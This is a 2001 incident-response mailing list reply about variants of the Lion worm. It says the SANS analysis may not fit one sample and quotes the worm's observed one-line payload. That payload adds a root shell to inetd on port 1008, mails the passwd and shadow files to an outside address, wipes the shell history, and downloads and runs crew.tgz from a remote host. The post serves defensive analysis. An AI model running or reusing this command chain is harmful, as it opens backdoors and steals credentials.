Security Incidents mailing list archives
Re: Lion Worm/crew.tgz
From: David Brumley <dbrumley () RTFM STANFORD EDU>
Date: Fri, 23 Mar 2001 13:36:50 -0800
Neil Long <neil.long () computing-services oxford ac uk> mailed me and mentioned that it might be worth pointing out that the SANS GIAC analysis is not valid for the crew.tgz version that was sent to Incidents by Andreas stling <andreaso () IT SU SE> There is no t0rn rootkit involved and the root shell is on 1008 so their Lionfind may be misleading. Of course, they could be half a dozen variants on the loose by this stage.
^^^^^^^^^^^^^^ In february we saw the following exploit: PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PATH;export TERM=vt 100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.lib;echo '1008 stream tcp nowait r oot /bin/sh sh' >>/etc/inetd.conf;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/p asswd >>1i0n;cat /etc/shadow >>1i0n;mail 1i0nip () china com <1i0n;rm -fr 1i0n;rm - fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit; The tar file did contain t0rn. This is why the sort of tools sans released are good heuristics, but not definitive. The same can be said for rootkit scanners, IDS systems, and just about anything else. ho hum. -djb -- #+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+# David Brumley - Stanford Computer Security - dbrumley at Stanford.EDU Phone: +1-650-723-2445 WWW: http://www.stanford.edu/~dbrumley Fax: +1-650-725-9121 PGP: finger dbrumley-pgp at sunset.Stanford.EDU #+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+#+--+# Life is a whim of several billion cells to be you for a while.
Current thread:
- Lion Worm/crew.tgz Alfred Huger (Mar 23)
- Re: Lion Worm/crew.tgz David Brumley (Mar 23)
- Re: Lion Worm/crew.tgz Andreas Östling (Mar 23)
- Re: Lion Worm/crew.tgz Joshua Krage (Mar 23)
- Re: Lion Worm/crew.tgz Neil Long (Mar 24)
- Re: Lion Worm/crew.tgz Michael H. Warfield (Mar 24)
- Re: Lion Worm/crew.tgz Andreas Östling (Mar 24)
- Re: Lion Worm/crew.tgz Michael H. Warfield (Mar 24)
- Re: Lion Worm/crew.tgz Dave Dittrich (Mar 26)
- Re: Lion Worm/crew.tgz Andreas Östling (Mar 24)
- Re: Lion Worm/crew.tgz John Jasen (Mar 26)
- Re: Lion Worm/crew.tgz Cooper (Mar 26)
- Re: Lion Worm/crew.tgz John Jasen (Mar 26)
- Re: Lion Worm/crew.tgz Cooper (Mar 26)